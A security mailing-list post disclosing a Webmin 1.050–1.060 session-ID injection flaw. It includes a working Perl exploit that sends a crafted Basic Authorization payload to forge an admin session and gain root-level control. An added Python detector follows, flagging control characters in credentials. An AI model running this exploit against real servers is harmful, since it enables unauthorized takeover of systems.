Webmin 1.050 - 1.060 remote exploit

Hi all,

Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) being enabled.

Webmin can verify user authentication by use of a session ID (SID) that is 
assigned when a user successfully authenticates to Webmin. It is possible to 
inject a fake SID into the session ID database by using a malicious username 
containing control sequences used internally by Webmin.

This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it 
is a simple case of creating a cookie in your favorite browser containing:

sid=1234567890; testing=1

Such that the Cookie HTTP header contains:

Cookie: sid=1234567890; testing=1

When the webmin server receives this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.

Cheers,
Carl

#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#

print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";

$nc="/usr/bin/netcat";

if($#ARGV == -1) {
	print "Syntax:\n\t$0 hostname\n";
	exit(1);
}

$hostname=$ARGV[0];

if ( ! -x $nc ) {
	print "netcat not found!\n";
	exit(2);
}

open(NC, "|$nc $hostname 10000 >& /dev/null");
print NC "GET / HTTP/1.1\n";
print NC "Host: $hostname\n";
print NC "User-agent: webmin\n";
print NC "Authorization: Basic YSBhIDEKbmV3IDEyMzQ1Njc4OTAgYWRtaW46cGFzc3dvcmQ=\n\n";
close(NC);

print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
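The post above describes a username carrying control sequences inside an HTTP Basic `Authorization` header. From the defender's side, such a request is easy to spot in captured traffic or a proxy log: a legitimate Basic credential decodes to `user:password` with no control characters in it. The following Python is an added example, not part of the original post or of Webmin itself; the raw requests it inspects are constructed for the demonstration, and the `Authorization` header regex is an assumption about the capture format.

```python
"""Flag HTTP Basic Authorization headers whose decoded credentials contain
control characters (an embedded newline, for instance).  Added example for
this mailing-list post; not the post's own code and not Webmin code.
The sample requests below are constructed, not captured traffic."""
import base64
import binascii
import re

# Assumption: the capture holds raw HTTP request text, one request per string.
AUTH_RE = re.compile(r"Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_basic(token):
    """Return the decoded credential bytes, or None if the token is not valid base64."""
    try:
        return base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None


def has_control_chars(raw):
    """True if any byte is an ASCII control character (0x00-0x1f or 0x7f)."""
    return any(b < 0x20 or b == 0x7F for b in raw)


def inspect_request(request_text):
    """Classify one raw HTTP request.

    Returns a dict with 'auth' (Basic header present), 'suspicious' and 'reason'.
    """
    match = AUTH_RE.search(request_text)
    if not match:
        return {"auth": False, "suspicious": False, "reason": "no Basic auth"}
    raw = decode_basic(match.group(1))
    if raw is None:
        return {"auth": True, "suspicious": True, "reason": "undecodable base64"}
    if has_control_chars(raw):
        # A newline or other control byte inside a credential is never legitimate;
        # this is the trait of the malicious username the post describes.
        return {"auth": True, "suspicious": True, "reason": "control characters in credentials"}
    if b":" not in raw:
        return {"auth": True, "suspicious": True, "reason": "no user:password separator"}
    return {"auth": True, "suspicious": False, "reason": "ok"}


def scan(requests):
    """Return the indices of requests that inspect_request() flags as suspicious."""
    return [i for i, req in enumerate(requests) if inspect_request(req)["suspicious"]]


# Constructed sample traffic: one ordinary login and one credential with an
# embedded newline (a generic control-character payload, not any real format).
_BENIGN_TOKEN = base64.b64encode(b"alice:s3cret").decode()
_MALICIOUS_TOKEN = base64.b64encode(b"alice\ninjected-line:pw").decode()

SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: webmin.example\r\n"
    "Authorization: Basic " + _BENIGN_TOKEN + "\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: webmin.example\r\nUser-agent: webmin\r\n"
    "Authorization: Basic " + _MALICIOUS_TOKEN + "\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: webmin.example\r\n\r\n",
]

if __name__ == "__main__":
    for i, req in enumerate(SAMPLE_REQUESTS):
        print(i, inspect_request(req))
    print("flagged:", scan(SAMPLE_REQUESTS))
```

The check is deliberately coarse: it does not try to understand the application's internal session format, only the invariant that a Basic credential is printable `user:password` text. The same test applies equally well as an input-validation rule in front of the login handler, which is the mitigation that removes this class of injection regardless of the passdelay setting.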
